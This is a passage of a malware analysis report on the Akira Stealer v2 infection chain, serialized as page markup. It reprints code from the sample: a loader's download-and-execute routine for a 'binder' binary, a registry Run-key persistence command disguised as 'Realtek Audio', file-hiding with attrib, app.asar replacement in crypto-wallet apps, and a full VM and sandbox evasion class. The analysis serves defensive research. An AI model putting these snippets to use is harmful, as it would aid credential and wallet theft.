Explorer\"",[102,11749,10716],{"class":293},[102,11751,11752,11755],{"class":104,"line":662},[102,11753,11754],{"class":289},"    \"UserData\"",[102,11756,10716],{"class":293},[102,11758,11759,11762],{"class":104,"line":668},[102,11760,11761],{"class":289},"    \"Updater.exe\"",[102,11763,10716],{"class":293},[102,11765,11766],{"class":104,"line":674},[102,11767,11768],{"class":293},"  ),\n",[102,11770,11771],{"class":104,"line":680},[102,11772,825],{"class":293},[1254,11774,11775,11778],{},[1257,11776,11777],{},"PORTABLE_EXECUTABLE_FILE is an environment variable automatically set by many packers (such as Electron) to reference the path of the executing binary.",[1257,11779,11780],{},"path.join(...) builds a fully-qualified destination path across different operating systems.",[12,11782,11783],{},"This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.",[12,11785,11786,11789],{},[251,11787,11788],{},"Role in the Malware Chain","\nThe presence of this copied Updater.exe ensures that:",[1254,11791,11792,11795],{},[1257,11793,11794],{},"The loader can re-trigger itself across system reboots.",[1257,11796,11797],{},"The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.",[186,11799,11801],{"id":11800},"_626-optional-binder-execution","6.2.6 Optional Binder Execution",[12,11803,192],{},[12,11805,11806,11807,11809],{},"In addition to downloading and executing the main stealer payload (",[63,11808,8304],{},"), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the \"binder.\" This component can be used for persistence, distraction, or deployment of additional malware modules.",[12,11811,11812],{},[251,11813,11814],{},"Conditional Execution",[12,11816,11817],{},"The binder logic is only activated if a specific flag is set:",[56,11819,11821],{"className":10662,"code":11820,"language":10664,"meta":65,"style":65},"enableBinder = true;\n",[63,11822,11823],{"__ignoreMap":65},[102,11824,11825,11828,11830,11833],{"class":104,"line":105},[102,11826,11827],{"class":293},"enableBinder ",[102,11829,10835],{"class":285},[102,11831,11832],{"class":275}," true",[102,11834,1364],{"class":293},[12,11836,11837,11838,11841],{},"In the sample analyzed, this value was set to ",[63,11839,11840],{},"false"," by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.",[12,11843,11844],{},[251,11845,11846],{},"Binder Download Logic",[12,11848,11849,11850,11853],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[63,11851,11852],{},"%BINDERURL%"," placeholder:",[56,11855,11857],{"className":10662,"code":11856,"language":10664,"meta":65,"style":65},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[63,11858,11859,11873,11893,11908],{"__ignoreMap":65},[102,11860,11861,11863,11866,11868,11871],{"class":104,"line":105},[102,11862,10671],{"class":285},[102,11864,11865],{"class":275}," fileUrl",[102,11867,10677],{"class":285},[102,11869,11870],{"class":289}," \"%BINDERURL%\"",[102,11872,1364],{"class":293},[102,11874,11875,11877,11879,11881,11883,11885,11887,11889,11891],{"class":104,"line":111},[102,11876,10671],{"class":285},[102,11878,11137],{"class":275},[102,11880,10677],{"class":285},[102,11882,11142],{"class":285},[102,11884,11145],{"class":293},[102,11886,11148],{"class":271},[102,11888,11151],{"class":293},[102,11890,11154],{"class":289},[102,11892,11157],{"class":293},[102,11894,11895,11897,11899,11901,11903,11905],{"class":104,"line":329},[102,11896,10671],{"class":285},[102,11898,11175],{"class":275},[102,11900,10677],{"class":285},[102,11902,11180],{"class":293},[102,11904,11183],{"class":271},[102,11906,11907],{"class":293},"(binderFile);\n",[102,11909,11910,11912,11914],{"class":104,"line":346},[102,11911,11191],{"class":293},[102,11913,11194],{"class":271},[102,11915,11197],{"class":293},[1254,11917,11918,11923],{},[1257,11919,399,11920,11922],{},[63,11921,11025],{}," file is saved into the system's temporary directory.",[1257,11924,11925,11926,11928],{},"Like ",[63,11927,10549],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[12,11930,11931],{},[251,11932,11933],{},"Execution Strategy",[12,11935,11936,11937,11939],{},"After successful download, the script invokes the downloaded binary using ",[63,11938,8804],{},", ensuring that it runs in a new shell context:",[56,11941,11943],{"className":10662,"code":11942,"language":10664,"meta":65,"style":65},"exec(`start cmd /c start ${binderFile}`, ...);\n",[63,11944,11945],{"__ignoreMap":65},[102,11946,11947,11949,11951,11954,11957,11960,11962,11965],{"class":104,"line":105},[102,11948,11582],{"class":271},[102,11950,545],{"class":293},[102,11952,11953],{"class":289},"`start cmd /c start ${",[102,11955,11956],{"class":293},"binderFile",[102,11958,11959],{"class":289},"}`",[102,11961,805],{"class":293},[102,11963,11964],{"class":285},"...",[102,11966,825],{"class":293},[12,11968,11969],{},"To increase reliability, the script includes retry logic:",[56,11971,11973],{"className":10662,"code":11972,"language":10664,"meta":65,"style":65},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[63,11974,11975,11987,11998],{"__ignoreMap":65},[102,11976,11977,11980,11983,11985],{"class":104,"line":105},[102,11978,11979],{"class":271},"setTimeout",[102,11981,11982],{"class":293},"(() ",[102,11984,11455],{"class":285},[102,11986,11458],{"class":293},[102,11988,11989,11992,11994,11996],{"class":104,"line":111},[102,11990,11991],{"class":271},"  exec",[102,11993,545],{"class":293},[102,11995,11964],{"class":285},[102,11997,825],{"class":293},[102,11999,12000,12003,12006],{"class":104,"line":329},[102,12001,12002],{"class":293},"}, ",[102,12004,12005],{"class":275},"5000",[102,12007,825],{"class":293},[12,12009,12010],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[12,12012,12013],{},[251,12014,12015],{},"Use Cases for the Binder",[12,12017,12018],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used to:",[1254,12020,12021,12024,12027,12030],{},[1257,12022,12023],{},"Reinstall or relaunch the primary malware components",[1257,12025,12026],{},"Display fake installers or decoy applications",[1257,12028,12029],{},"Deploy additional spyware, backdoors, or ransomware",[1257,12031,12032],{},"Modify system settings or disable security features",[41,12034,12036],{"id":12035},"_63-summary","6.3 Summary",[12,12038,47],{},[12,12040,12041,12043],{},[63,12042,10488],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[1254,12045,12046,12051,12054,12059],{},[1257,12047,12048,12049,1288],{},"Retrieves further malware (",[63,12050,10549],{},[1257,12052,12053],{},"Modifies payload behavior dynamically",[1257,12055,12056,12057,1288],{},"Launches the actual stealer script (",[63,12058,8304],{},[1257,12060,12061,12062],{},"Reinforces persistence by restoring ",[63,12063,8296],{},[12,12065,12066,12067,12070],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[251,12068,12069],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[25,12072,12074,12075,1288],{"id":12073},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[63,12076,8304],{},[12,12078,31],{},[41,12080,12082],{"id":12081},"_71-high-level-functionality","7.1. High-Level Functionality",[12,12084,47],{},[12,12086,12087,12088,12090],{},"Akira Stealer v2 (",[63,12089,8304],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[41,12092,12094],{"id":12093},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[12,12096,47],{},[186,12098,12100],{"id":12099},"_721-execution-chain-context","7.2.1 Execution Chain Context",[12,12102,192],{},[12,12104,12105,12107],{},[63,12106,8304],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[56,12109,12113],{"className":12110,"code":12111,"language":12112,"meta":65,"style":65},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[63,12114,12115,12120,12125,12130],{"__ignoreMap":65},[102,12116,12117],{"class":104,"line":105},[102,12118,12119],{},"Updater.exe\n",[102,12121,12122],{"class":104,"line":111},[102,12123,12124],{},"  └── main.exe (Electron app)\n",[102,12126,12127],{"class":104,"line":329},[102,12128,12129],{},"        └── cmd.exe\n",[102,12131,12132],{"class":104,"line":346},[102,12133,12134],{},"              └── python.exe astor.py\n",[12,12136,12137,12138,12140],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[63,12139,8296],{}," initiates the sequence and is responsible for maintaining persistence.",[186,12142,12144],{"id":12143},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[12,12146,192],{},[12,12148,12149,12150,12152],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. This ensures that ",[63,12151,8296],{}," is executed on each system startup:",[56,12154,12158],{"className":12155,"code":12156,"language":12157,"meta":65,"style":65},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[63,12159,12160,12165],{"__ignoreMap":65},[102,12161,12162],{"class":104,"line":105},[102,12163,12164],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[102,12166,12167],{"class":104,"line":111},[102,12168,12169],{},"os.system(command)\n",[1254,12171,12172,12179,12187],{},[1257,12173,12174,1061,12177],{},[251,12175,12176],{},"Path",[63,12178,9343],{},[1257,12180,12181,1061,12184,12186],{},[251,12182,12183],{},"Value name",[63,12185,9351],{}," (chosen to appear benign)",[1257,12188,12189,12192,12193],{},[251,12190,12191],{},"Payload path",": Typically in ",[63,12194,12195],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[12,12197,12198,12199,12202],{},"This command silently writes the autorun entry via PowerShell or native ",[63,12200,12201],{},"os.system()"," execution.",[186,12204,12206],{"id":12205},"_723-file-concealment","7.2.3 File Concealment",[12,12208,192],{},[12,12210,12211],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[56,12213,12215],{"className":12155,"code":12214,"language":12157,"meta":65,"style":65},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[63,12216,12217],{"__ignoreMap":65},[102,12218,12219],{"class":104,"line":105},[102,12220,12214],{},[1254,12222,12223,12229],{},[1257,12224,12225,12228],{},[63,12226,12227],{},"+h",": Marks the file as hidden",[1257,12230,12231,12234],{},[63,12232,12233],{},"+s",": Marks the file as a protected system file",[12,12236,12237],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[186,12239,12241],{"id":12240},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[12,12243,192],{},[12,12245,12246,12247,12249,12250,805,12253,12256],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[63,12248,8749],{}," archive in Electron-based desktop wallets (e.g., ",[251,12251,12252],{},"Exodus",[251,12254,12255],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[12,12258,12259],{},"The logic looks for known wallet app paths:",[56,12261,12263],{"className":12155,"code":12262,"language":12157,"meta":65,"style":65},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[63,12264,12265],{"__ignoreMap":65},[102,12266,12267],{"class":104,"line":105},[102,12268,12262],{},[12,12270,12271,12272,1013],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[63,12273,8296],{},[41,12275,12277,12278,1288],{"id":12276},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[63,12279,12280],{},"VmProtect",[12,12282,47],{},[186,12284,12286],{"id":12285},"_731-introduction","7.3.1 Introduction",[12,12288,192],{},[12,12290,12291,12292,12294,12295,12297],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[3456,12293,8365],{}," implements a comprehensive VM/sandbox detection module (",[63,12296,12280],{},") that aggressively identifies and aborts execution under analyst-controlled environments. This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[186,12299,12301],{"id":12300},"_732-overview","7.3.2 Overview",[12,12303,192],{},[12,12305,399,12306,12308],{},[63,12307,12280],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[1254,12310,12311,12317],{},[1257,12312,12313,12316],{},[251,12314,12315],{},"Level 1",": Lightweight, fast checks",[1257,12318,12319,12322],{},[251,12320,12321],{},"Level 2",": In-depth, comprehensive probes",[12,12324,12325,12326,12329,12330,12333,12334,12337],{},"If ",[63,12327,12328],{},"VmProtect.isVM(level)"," returns ",[63,12331,12332],{},"True",", the malware calls ",[63,12335,12336],{},"sys.exit()",", preventing further analysis.",[186,12339,12341],{"id":12340},"_733-detection-levels","7.3.3 Detection Levels",[12,12343,192],{},[417,12345,420,12347],{"style":12346},"width:100%; border-collapse: collapse;",[438,12348,12349,420,12358,420,12368,420,12378,420,12387,420,12397,420,12406,420,12415],{},[426,12350,424,12351,424,12354,424,12356,420],{},[430,12352,12353],{},"Feature",[430,12355,12315],{"style":6608},[430,12357,12321],{"style":6608},[426,12359,424,12360,424,12363,424,12366,420],{},[443,12361,12362],{},"HTTPSimulation",[443,12364,12365],{"style":6608},"✔️",[443,12367,12365],{"style":6608},[426,12369,424,12371,424,12374,424,12376,420],{"style":12370},"background-color: #f5f5f5;",[443,12372,12373],{},"Computer-name blacklist",[443,12375,12365],{"style":6608},[443,12377,12365],{"style":6608},[426,12379,424,12380,424,12383,424,12385,420],{},[443,12381,12382],{},"User-account blacklist",[443,12384,12365],{"style":6608},[443,12386,12365],{"style":6608},[426,12388,424,12389,424,12392,424,12395,420],{"style":12370},[443,12390,12391],{},"Hardware-UUID blacklist",[443,12393,12394],{"style":6608},"❌",[443,12396,12365],{"style":6608},[426,12398,424,12399,424,12402,424,12404,420],{},[443,12400,12401],{},"Public-hosting API check",[443,12403,12394],{"style":6608},[443,12405,12365],{"style":6608},[426,12407,424,12408,424,12411,424,12413,420],{"style":12370},[443,12409,12410],{},"Registry & GPU hints",[443,12412,12394],{"style":6608},[443,12414,12365],{"style":6608},[426,12416,424,12417,424,12420,424,12422,420],{},[443,12418,12419],{},"Task-killing background",[443,12421,12365],{"style":6608},[443,12423,12365],{"style":6608},[52,12425],{"className":12426},[8535,8536],[186,12428,12430,12431,12433],{"id":12429},"_734-vmprotect-architecture","7.3.4 ",[63,12432,12280],{}," Architecture",[12,12435,192],{},[12,12437,399,12438,12440],{},[63,12439,12280],{}," class exposes the following primary methods:",[1254,12442,12443,12450,12457,12464,12471,12478,12485,12492],{},[1257,12444,12445],{},[251,12446,12447],{},[63,12448,12449],{},"checkUUID()",[1257,12451,12452],{},[251,12453,12454],{},[63,12455,12456],{},"checkComputerName()",[1257,12458,12459],{},[251,12460,12461],{},[63,12462,12463],{},"checkUsers()",[1257,12465,12466],{},[251,12467,12468],{},[63,12469,12470],{},"checkHosting()",[1257,12472,12473],{},[251,12474,12475],{},[63,12476,12477],{},"checkHTTPSimulation()",[1257,12479,12480],{},[251,12481,12482],{},[63,12483,12484],{},"checkRegistry()",[1257,12486,12487],{},[251,12488,12489],{},[63,12490,12491],{},"killTasks()",[1257,12493,12494],{},[251,12495,12496],{},[63,12497,12498],{},"isVM(level)",[12,12500,12501,12502,12505],{},"Each method returns a boolean or executes evasion steps. The ",[63,12503,12504],{},"isVM"," wrapper aggregates these checks based on the specified level.",[417,12507,420,12508],{"style":12346},[438,12509,12510,420,12522,420,12536,420,12550,420,12563,420,12576,420,12589,420,12602,420,12617],{},[426,12511,424,12512,424,12516,424,12519,420],{},[430,12513,12515],{"style":12514},"text-align: left;","Method",[430,12517,12518],{"style":12514},"Triggered By",[430,12520,12521],{"style":12514},"Description",[426,12523,424,12524,424,12528,424,12533,420],{},[443,12525,12526],{},[63,12527,12449],{},[443,12529,12530],{},[63,12531,12532],{},"isVM(2)",[443,12534,12535],{},"WMI UUID blacklist",[426,12537,424,12538,424,12542,424,12547,420],{"style":12370},[443,12539,12540],{},[63,12541,12456],{},[443,12543,12544],{},[63,12545,12546],{},"isVM(1,2)",[443,12548,12549],{},"Environment hostname match",[426,12551,424,12552,424,12556,424,12560,420],{},[443,12553,12554],{},[63,12555,12463],{},[443,12557,12558],{},[63,12559,12546],{},[443,12561,12562],{},"Username blacklist",[426,12564,424,12565,424,12569,424,12573,420],{"style":12370},[443,12566,12567],{},[63,12568,12470],{},[443,12570,12571],{},[63,12572,12532],{},[443,12574,12575],{},"IP hosting provider check via ip-api.com",[426,12577,424,12578,424,12582,424,12586,420],{},[443,12579,12580],{},[63,12581,12477],{},[443,12583,12584],{},[63,12585,12546],{},[443,12587,12588],{},"HTTPS interception detection",[426,12590,424,12591,424,12595,424,12599,420],{"style":12370},[443,12592,12593],{},[63,12594,12484],{},[443,12596,12597],{},[63,12598,12532],{},[443,12600,12601],{},"Registry & GPU driver artifacts",[426,12603,424,12604,424,12608,424,12614,420],{},[443,12605,12606],{},[63,12607,12491],{},[443,12609,12610,12613],{},[63,12611,12612],{},"isVM(...)"," spawn",[443,12615,12616],{},"Terminates known analysis processes",[426,12618,424,12619,424,12623,424,12626,420],{"style":12370},[443,12620,12621],{},[63,12622,12498],{},[443,12624,12625],{},"init",[443,12627,12628,12629,12631],{},"Aggregates checks and calls ",[63,12630,12491],{}," thread",[52,12633],{"className":12634},[8535,8536],[56,12636,12638],{"className":12155,"code":12637,"language":12157,"meta":65,"style":65},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[63,12639,12640,12645,12650,12655,12660,12665,12670,12675,12680,12685,12690,12696,12702,12708,12714,12720,12726,12732,12738,12744,12750,12756,12762,12768,12774],{"__ignoreMap":65},[102,12641,12642],{"class":104,"line":105},[102,12643,12644],{},"@staticmethod\n",[102,12646,12647],{"class":104,"line":111},[102,12648,12649],{},"def isVM(level: int) -> bool:\n",[102,12651,12652],{"class":104,"line":329},[102,12653,12654],{},"    # Always start background task-killer\n",[102,12656,12657],{"class":104,"line":346},[102,12658,12659],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[102,12661,12662],{"class":104,"line":650},[102,12663,12664],{},"    if level == 1:\n",[102,12666,12667],{"class":104,"line":656},[102,12668,12669],{},"        # Fast path: HTTPS, hostname & user\n",[102,12671,12672],{"class":104,"line":662},[102,12673,12674],{},"        return (\n",[102,12676,12677],{"class":104,"line":668},[102,12678,12679],{},"            VmProtect.checkHTTPSimulation()\n",[102,12681,12682],{"class":104,"line":674},[102,12683,12684],{},"            or VmProtect.checkComputerName()\n",[102,12686,12687],{"class":104,"line":680},[102,12688,12689],{},"            or VmProtect.checkUsers()\n",[102,12691,12693],{"class":104,"line":12692},11,[102,12694,12695],{},"        )\n",[102,12697,12699],{"class":104,"line":12698},12,[102,12700,12701],{},"    if level == 2:\n",[102,12703,12705],{"class":104,"line":12704},13,[102,12706,12707],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[102,12709,12711],{"class":104,"line":12710},14,[102,12712,12713],{},"        try:\n",[102,12715,12717],{"class":104,"line":12716},15,[102,12718,12719],{},"            return (\n",[102,12721,12723],{"class":104,"line":12722},16,[102,12724,12725],{},"                VmProtect.checkHTTPSimulation()\n",[102,12727,12729],{"class":104,"line":12728},17,[102,12730,12731],{},"                or VmProtect.checkUUID()\n",[102,12733,12735],{"class":104,"line":12734},18,[102,12736,12737],{},"                or VmProtect.checkComputerName()\n",[102,12739,12741],{"class":104,"line":12740},19,[102,12742,12743],{},"                or VmProtect.checkUsers()\n",[102,12745,12747],{"class":104,"line":12746},20,[102,12748,12749],{},"                or VmProtect.checkHosting()\n",[102,12751,12753],{"class":104,"line":12752},21,[102,12754,12755],{},"                or VmProtect.checkRegistry()\n",[102,12757,12759],{"class":104,"line":12758},22,[102,12760,12761],{},"            )\n",[102,12763,12765],{"class":104,"line":12764},23,[102,12766,12767],{},"        except:\n",[102,12769,12771],{"class":104,"line":12770},24,[102,12772,12773],{},"            return False\n",[102,12775,12777],{"class":104,"line":12776},25,[102,12778,12779],{},"    return False\n",[186,12781,12783],{"id":12782},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware UUID",[12,12785,192],{},[12,12787,12788],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[56,12790,12792],{"className":12155,"code":12791,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[63,12793,12794,12798,12803,12808,12813,12818,12823,12828,12833,12838],{"__ignoreMap":65},[102,12795,12796],{"class":104,"line":105},[102,12797,12644],{},[102,12799,12800],{"class":104,"line":111},[102,12801,12802],{},"def checkUUID() -> bool:\n",[102,12804,12805],{"class":104,"line":329},[102,12806,12807],{},"    try:\n",[102,12809,12810],{"class":104,"line":346},[102,12811,12812],{},"        raw = subprocess.run(\n",[102,12814,12815],{"class":104,"line":650},[102,12816,12817],{},"            \"wmic csproduct get uuid\", shell=True,\n",[102,12819,12820],{"class":104,"line":656},[102,12821,12822],{},"            capture_output=True\n",[102,12824,12825],{"class":104,"line":662},[102,12826,12827],{},"        ).stdout.splitlines()[2].decode().strip()\n",[102,12829,12830],{"class":104,"line":668},[102,12831,12832],{},"    except:\n",[102,12834,12835],{"class":104,"line":674},[102,12836,12837],{},"        raw = \"\"\n",[102,12839,12840],{"class":104,"line":680},[102,12841,12842],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[12,12844,12845],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[186,12847,12849],{"id":12848},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[12,12851,192],{},[12,12853,12854,12855,12858],{},"The system hostname, accessed via the ",[63,12856,12857],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[56,12860,12862],{"className":12155,"code":12861,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... dozens more entries ...\n)\n",[63,12863,12864,12868,12873,12878,12883,12887,12892,12897,12902,12907],{"__ignoreMap":65},[102,12865,12866],{"class":104,"line":105},[102,12867,12644],{},[102,12869,12870],{"class":104,"line":111},[102,12871,12872],{},"def checkComputerName() -> bool:\n",[102,12874,12875],{"class":104,"line":329},[102,12876,12877],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[102,12879,12880],{"class":104,"line":346},[102,12881,12882],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,12884,12885],{"class":104,"line":650},[102,12886,11519],{"emptyLinePlaceholder":2181},[102,12888,12889],{"class":104,"line":656},[102,12890,12891],{},"BLACKLISTED_COMPUTERNAMES = (\n",[102,12893,12894],{"class":104,"line":662},[102,12895,12896],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[102,12898,12899],{"class":104,"line":668},[102,12900,12901],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[102,12903,12904],{"class":104,"line":674},[102,12905,12906],{},"    # ... dozens more entries ...\n",[102,12908,12909],{"class":104,"line":680},[102,12910,12911],{},")\n",[12,12913,12914],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[186,12916,12918],{"id":12917},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[12,12920,192],{},[12,12922,12923],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". These names are low-entropy and often hardcoded in open source sandbox environments.",[56,12925,12927],{"className":12155,"code":12926,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[63,12928,12929,12933,12938,12943,12948,12952,12957,12962,12967,12972],{"__ignoreMap":65},[102,12930,12931],{"class":104,"line":105},[102,12932,12644],{},[102,12934,12935],{"class":104,"line":111},[102,12936,12937],{},"def checkUsers() -> bool:\n",[102,12939,12940],{"class":104,"line":329},[102,12941,12942],{},"    user = os.getlogin().lower()\n",[102,12944,12945],{"class":104,"line":346},[102,12946,12947],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[102,12949,12950],{"class":104,"line":650},[102,12951,11519],{"emptyLinePlaceholder":2181},[102,12953,12954],{"class":104,"line":656},[102,12955,12956],{},"BLACKLISTED_USERS = (\n",[102,12958,12959],{"class":104,"line":662},[102,12960,12961],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[102,12963,12964],{"class":104,"line":668},[102,12965,12966],{},"    'a.monaldo','tvm',\n",[102,12968,12969],{"class":104,"line":674},[102,12970,12971],{},"    # ... 30+ more entries ...\n",[102,12973,12974],{"class":104,"line":680},[102,12975,12911],{},[12,12977,12978],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[186,12980,12982],{"id":12981},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[12,12984,192],{},[12,12986,12987,12988,12991],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. In this case, a simple HTTP request is made to ",[63,12989,12990],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[56,12993,12995],{"className":12155,"code":12994,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[63,12996,12997,13001,13006,13011,13015,13020,13025,13030,13035,13039],{"__ignoreMap":65},[102,12998,12999],{"class":104,"line":105},[102,13000,12644],{},[102,13002,13003],{"class":104,"line":111},[102,13004,13005],{},"def checkHosting() -> bool:\n",[102,13007,13008],{"class":104,"line":329},[102,13009,13010],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[102,13012,13013],{"class":104,"line":346},[102,13014,12807],{},[102,13016,13017],{"class":104,"line":650},[102,13018,13019],{},"        return http.request(\n",[102,13021,13022],{"class":104,"line":656},[102,13023,13024],{},"            'GET',\n",[102,13026,13027],{"class":104,"line":662},[102,13028,13029],{},"            'http://ip-api.com/line/?fields=hosting'\n",[102,13031,13032],{"class":104,"line":668},[102,13033,13034],{},"        ).data.decode().strip() == 'true'\n",[102,13036,13037],{"class":104,"line":674},[102,13038,12832],{},[102,13040,13041],{"class":104,"line":680},[102,13042,13043],{},"        return False\n",[12,13045,13046],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[186,13048,13050],{"id":13049},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[12,13052,192],{},[12,13054,13055,13056,13059],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign HTTPS request to a random subdomain under ",[63,13057,13058],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[56,13061,13063],{"className":12155,"code":13062,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return 